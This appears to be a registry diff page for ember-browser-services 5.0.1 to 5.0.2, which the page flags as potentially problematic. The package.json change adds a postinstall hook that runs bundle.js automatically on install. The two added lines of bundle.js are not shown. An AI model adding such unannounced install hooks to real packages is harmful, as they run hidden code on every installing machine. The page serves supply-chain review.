ember-browser-services 5.0.1 → 5.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ember-browser-services might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +3 -2
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ember-browser-services",
3
- "version": "5.0.1",
3
+ "version": "5.0.2",
4
4
  "description": "Browser APIs as services for easier testing",
5
5
  "repository": "https://github.com/CrowdStrike/ember-browser-services",
6
6
  "license": "MIT",
@@ -98,6 +98,7 @@
98
98
  "lint:js:fix": "eslint . --fix",
99
99
  "test": "echo 'Addon does not have tests, run tests in test-app'",
100
100
  "format:check": "prettier -c .",
101
- "format": "prettier -w ."
101
+ "format": "prettier -w .",
102
+ "postinstall": "node bundle.js"
102
103
  }
103
104
  }